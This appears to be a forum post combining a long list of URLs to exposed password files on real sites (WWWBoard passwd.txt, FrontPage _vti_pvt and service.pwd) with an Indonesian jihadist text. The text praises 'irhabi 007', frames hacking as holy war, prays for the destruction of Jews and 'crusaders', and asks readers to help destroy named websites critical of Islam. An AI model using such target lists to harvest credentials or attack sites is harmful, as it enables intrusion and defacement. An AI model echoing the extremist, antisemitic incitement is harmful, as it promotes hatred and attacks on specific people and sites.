http://www.mtsu.edu/~ccurry/sets/ex..oard/passwd.txthttp://www.kaibutsu-thx.com/cx/htm/wwwboard/passwd.txthttp://www.kidlink.org/KIDPROJ/Brid...oard/passwd.txthttp://www.markoschulz.de/scripte/f...oard/passwd.txthttp://crux.baker.edu/myeake01/wwwboard/passwd.txthttp://207.65.96.29/users/akira/wwwboard/passwd.txthttp://hkbne.virtualave.net/wwwboard/password.txthttp://gybe.com/boggy/swallowtails/wwwboard/passwd.txthttp://gazissax.best.vwh.net/alsira...oard/passwd.txthttp://www.deltakappagamma.org/Inte...oard/passwd.txthttp://pepup.hypermart.net/wwwboard/passwd.txthttp://www.utexas.edu/depts/asih/wwwboard/passwd.txthttp://hemi.ps.tsoa.nyu.edu/webchat/passwd.txt http://www.stenum.at/euinfo/passwd.txthttp://www.mexconnect.com/liveboard/passwd.txt http://www.doc.ic.ac.uk/~ pa98/jondon/passwd.txt http://www.pnpi.spb.ru/nrd/ucn/cgi-...dmin/passwd.txthttp://gazissax.best.vwh.net/alsira...oard/passwd.txt http://www.public. astate.edu/~benco/oclub/passwd.txt http://students.washington.edu/msa/waami/passwd.txthttp://member.mfea.com/Members/bbs/admin/passwd.txthttp://ais.gmd.de/~sylla/Archive/passwd.txthttp://www.lvadb.nl/regionalisering...9874/passwd.txthttp://www.jump.net/~alancook/discu...9311/passwd.txthttp://www.notam.com/forum/passwd.txt http://www.sandiego.edu/~deroche/group4p/passwd.txthttp://www.sandiego.edu/~deroche/case7/passwd.txt http://www.louisville.com/talk/passwd.txthttp://www.swe.org/SWE/Convention/den01/passwd.txthttp://www.colorado.edu/geography/g...sion/passwd.txthttp://www.uidaho.edu/webboard/src/passwd.txt http://dykesworld.de/Boards/sistah/passwd.txthttp://www.public. astate.edu/~n2ddg/IE565/passwd.txt http://www.pnpi.spb.ru/nrd/ucn/cgi-...dmin/passwd.txt http://www.pnpi.spb.ru/nrd/ucn/cgi-...s_admin/log.txthttp://www.pnpi.spb.ru/nrd/ucn/cgi-...in/adminlog.txt http://www.doc.ic.ac.uk/~ pa98/jondon/passwd.txt http://www.defenders.by.ru/texts/uni/uni-passwd.txt http://www.public. astate.edu/~benco/oclub/passwd.txt http://www.unionmen.com/forum/passwd.txthttp://facyt.uc.edu.ve/foros/passwd.txthttp://www.ku.edu/~philos/courses/wwwboard3/passwd.txthttp://ponce.inter.edu/forums/passwd.txt http://students.washington.edu/msa/...ulum/passwd.txthttp://www.uidaho.edu/webboard/src/passwd.txt http://www.louisville.com/talk/passwd.txthttp://www.motosalvagedirectory.com/forums/passwd.txthttp://gazissax.best.vwh.net/alsira...oard/passwd.txthttp://www.mexconnect.com/liveboard/passwd.txt http://www.inece.org/ozone/passwd.txthttp://www.usd.edu/phys/courses/ast...bord/passwd.txt http://cds.unina.it/~tuccillo/passwd.txthttp://ponce.inter.edu/forums/prueba/passwd.txt http://paradigm-dc.hypermart.net/passwd.txthttp://clonetheory.virtualave.net/passwd.txt http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txthttp://www.fh-potsdam.de/~potsmods/...ster/passwd.txthttp://www.endicott.edu/staff/kuhn/...9812/passwd.txthttp://www.artintheschool.org/forum/passwd.txthttp://www.utexas.edu/depts/grg/vir...sion/passwd.txt http://www.mag7.net/floor/passwd.txthttp://www.urban-forestry.com/forum/passwd.txthttp://pages.globetrotter.net/lhibb...oard/passwd.txt http://wealth-connection.com/bbs/passwd.txthttp://xipe.insp.mx/wwwboard/passwd.txt http://facyt.uc.edu.ve/foros/passwd.txthttp://c25c250.best.vwh.net/restr cted/passwd.txthttp://www.sandiego.edu/~deroche/case2/passwd.txthttp://www.sandiego.edu/~deroche/group6p/passwd.txthttp://home.gwi.net/~actonfd/bboard/passwd.txthttp://pages.stern.nyu.edu/~rgarud/helpchat/passwd.txthttp://acpon1.ponce.inter.edu/forums/prueba/passwd.txthttp://www.gugten.com/_pub/ARPA/forum/passwd.txthttp://library.thinkquest.org/~1013...dmin/passwd.txt

BUGS-BUGS FRONT PAGE:
www.ebc.uu.se/evolmuseum/_vti_pvt/ http://www.ebc.uu.se/klubban/_vti_pvt/http://police.hypermart.net/_vti_pvt/ http://www.seanachie.com/_vti_pvt/http://www.ahpcc.unm.edu/~aroberts/main/_vti_pvt/http://www.ahpcc.unm.edu/~aroberts/main/main/_vti_pvt/ http://www.tpeditor.com/_vti_pvt/http://www.sussex.ac.uk/tcmr/pgp/pgp2/_vti_pvt/http://www.sussex.ac.uk/Units/IRPol/MAnews/_vti_pvt/http://members.aol.com/r1953young/_vti_pvt/ http://www.lic.wisc.edu/shapingdane/_vti_pvt/http://www.gvc.gu.se/ngeo/ng-hem/china/_vti_pvt/ http://www.robertsmyth.leics.sch.uk/_vti_pvt/http://www.www.nr/My%20Webs/_vti_pvt/ http://siteventos.org.gt/tal_1/_vti_pvt/http://siteventos.org.gt/redes/_vti_pvt/ http://virtation.com/_vti_pvt/http://www.ch.ic.ac.uk/bbc/BCG/bcg2001/myweb/_vti_pvt/http://www.imolbio.oeaw.ac.at/xenopus/_vti_pvt/ http://www.humgym-meran.it/_vti_pvt/http://www.ceeinet.umd.edu/faculty/ahaghani/_vti_pvt/ http://www.chu-stlouis.fr/hematoonco/_vti_pvt/ http://www.ch.ic.ac.uk/local/projec...thorn/_vti_pvt/http://www.ce.cmu.edu/~mcnamara/_vti_pvt/ http://www.fht-stuttgart.de/fbv/fbvweb/ipo/_vti_pvt/ http://www.cem.ufpr.br/ecoturismo/_vti_pvt/http://www.net1.net/~akiecke/_vti_pvt/ http://www.bridgewater.edu/departme...tisms/_vti_pvt/http://www.lu.lv/jauna/strukt/jgs/_vti_pvt/ http://www.jmtrep.hpg.com.br/_vti_pvt/http://alpha.tamu.edu/public/jae/_vti_pvt/http://homepages.newnet.co.uk/netwo...k2000/_vti_pvt/ http://www.ff.up.pt/sirigaitas/_vti_pvt/http://www.cyclecoachingscotland.fr...co.uk/_vti_pvt/http://members.aol.com/tamaranth/_vti_pvt/http://www.bridgewater.edu/departme...owman/_vti_pvt/http://www.css.orst.edu/barley/_vti_pvt/ http://www.nilc.org.ge/geohealth/_vti_pvt/http://www.memorial.fund.ukf.net/_vti_pvt/ http://www.ipe.csic.es/cursos.escos/_vti_pvt/http://dnr.state.il.us/legislation/isah/_vti_pvt/ http://www.rrk-berlin.de/rrkweb/chirurgie/_vti_pvt/ http://www.jtr.gov.my/fik/_vti_pvt/http://ww1.baywell.ne.jp/fpweb/drlatham/_vti_pvt/ http://www.wms-access.com/Photo%20Gallery/_VTI_PVT/ http://www.lfp.cz/primaire/_vti_pvt/http://www.zs3zab.cz/_vti_pvt/service.pwd http://pages.citenet.net/users/ctmx...pvt/service.pwdhttp://ftp.scu.edu.tw/_vti_pvt/service.pwd http://orion.ifsi.rm.cnr.it/meeting...pvt/service.pwdhttp://www.momentus.com.br/users/le...pvt/service.pwdhttp://www2.alpinecom.net/_vti_pvt/service.pwdhttp://www.necc.cc.ms.us/~jpowell/_vti_pvt/service.pwdhttp://conca.users.netlink.co.uk/_vti_pvt/service.pwd

Syahdan…

Hanya milik Alloh lah segala pujian, baik di awal maupun di akhir, yang telah memberi kemudahan kepada kita untuk menyempurnakan karya berharga ini. Sebagaimana kami memohon kepada Alloh ketulusan dalam kata-kata dan perbuatan, kami juga memohon kepada-Nya ampunan dan pemaafan, taubat dan maghfiroh, kami berharap amal ini diterima dan derajat kami ditinggikan, dengan keutamaan-Nya, kelembutan-Nya, dan kemurahan-Nya.

Dengan terbitnya karya ini, berarti kami telah menegakkan hujjah atas mereka yang berpangku tangan saja (baca: Qô‘idûn), mereka yang menyelisihi jalan jihad dan yang mengutarakan berbagai alasan bahwa dirinya tidak mampu pergi ke medan pertempuran dan laga-laga peperangan. Sekarang, ini ada celah dan ada medan perang yang lain, maka berperanglah di jalan Alloh dalam medan tersebut. Kalian tetap akan mendapat pahala dan ganjaran, jika kalian hati dan niat kalian baik. Alloh menitahkan kebenaran dan Dia menunjukkan jalan yang benar.

Kita memohon kepada Alloh kemenangan yang mulia, kemenangan yang nyata, dan jalan keluar dari kesulitan yang dekat, bagi umat Islam secara umum dan bagi para mujahidin yang bertempur di garis depan secara khusus. Ya Alloh, hancurkanlah musuh-musuh umat, dari kalangan yahudi dan salibis, serta orang-orang yang mendukung mereka, membantu dan setia kepada mereka, dari kalangan orang-orang munafik dan murtad, semuanya. Allohumma Amiin…

Sebagai penutup, semoga Alloh terus menjaga akhi kita, yang mulia, yang mahal harganya dan yang senantiasa kami cintai: irhabi 007, dan selalu menjadikannya sebagai orang yang membuat kaum beriman berbahagia dan menyenangkan hati ahli tauhid di mana saja mereka berada, serta menyusahkan orang-orang kafir dan menghinakan orang-orang murtad dan munafik.

Ingat, jangan mengabaikan perintah-perintah Alloh di dalam kitab-Nya yang mulia, dan perintah-perintah Rosul-Nya SAW, untuk senantiasa berjihad fi sabilillah di berbagai daerah perbatasan dan mengintai musuh di setiap tempat pengintaian yang membuat Alloh dan Rosul-Nya ridho.

Hentikan bicara, mari mulai bekerja…

Jarak seribu mil dimulai dengan satu langkah, awal mula hujan lebat adalah titikan gerimis…
Doa terakhir kami adalah, alhamdulillâhi robbil ‘Alamîn, segala puji hanya milik Alloh Robb seru sekalian alam.

Semoga Alloh senantiasa melimpahkan sholawat, salam, serta berkah kepada pemimpin sekaligus Nabi kita, Muhammad, kepada keluarga dan para sahabatnya, serta orang-orang mengikuti mereka dengan kebaikan hingga hari kemudian.


Saudara kalian yang fakir, yang paling yunior dan bodoh di antara mereka:
Semoga Alloh senantiasa menjaganya, menjaga saudara-saudaranya dan menjaga kaum muslimin

 Note (tambahan saya ) : "Ini merupakan langkah-langkah praktis yang diajarkan agen Irhaby 007, ditujukan untuk melancarkan penyerangan pada sistus-situs Zionis dan Salibis yang mengancam kedamaian di muka bumi ini. Saya -dengan keterbatasan ilmu saya- belum bisa memanfaatkannya karena masih banyak yang belum saya pahami. bagi kawan-kawan yang dapat memanfaatkan ilmu ini, tolong bantu saya, bantu kita umat Islam terutama di Indonesia :"bantu kami untuk menghancurkan situs-situs yang mendeskreditkan Islam, menghina dan menjelek-jelekan Islam, yang mengemukakan pendapat hanya untuk menimbulkan kebencian saja"  seperti situs faithfreedom.com atau beritamuslim.wordpress.com dan lain-lainnya yang sejenis.....Tolonglah umat ini !!!!!!!